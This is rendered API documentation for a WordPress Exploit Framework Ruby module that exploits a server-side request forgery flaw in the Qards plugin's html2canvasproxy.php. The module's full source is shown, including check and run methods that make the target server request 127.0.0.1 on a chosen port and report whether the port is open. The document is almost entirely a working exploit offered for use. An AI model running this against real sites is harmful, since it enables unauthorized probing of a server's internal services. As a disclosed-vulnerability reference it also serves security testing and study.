class Wpxf::Auxiliary::QardsLocalPortScan
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/misc/qards_local_port_scan.rb, line 6 def initialize super update_info( name: 'Qards Local Port Scan', desc: %( This module exploits a server side request forgery vulnerability, which enables a remote user to check if a service is running on a local port. ), author: [ 'theMiddle', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8933'] ], date: 'Oct 11 2017' ) register_options([ PortOption.new( name: 'lport', desc: 'The port number to scan', required: true, default: 22 ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/misc/qards_local_port_scan.rb, line 35 def check res = execute_get_request(url: scan_url) res&.code == 200 ? :vulnerable : :safe end
lport()
click to toggle source
# File lib/wpxf/modules/auxiliary/misc/qards_local_port_scan.rb, line 44 def lport normalized_option_value('lport') end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/misc/qards_local_port_scan.rb, line 48 def run return false unless super res = execute_get_request(url: scan_url, params: { 'url' => "http://127.0.0.1:#{lport}" }) unless res&.code == 200 emit_error 'Response code was not 200', true return false end if res.body.match?(/SOCKET: Connection refused/) emit_warning "Port #{lport} is closed" else emit_success "Port #{lport} is open" end true end
scan_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/misc/qards_local_port_scan.rb, line 40 def scan_url normalize_uri(wordpress_url_plugins, 'qards', 'html2canvasproxy.php') end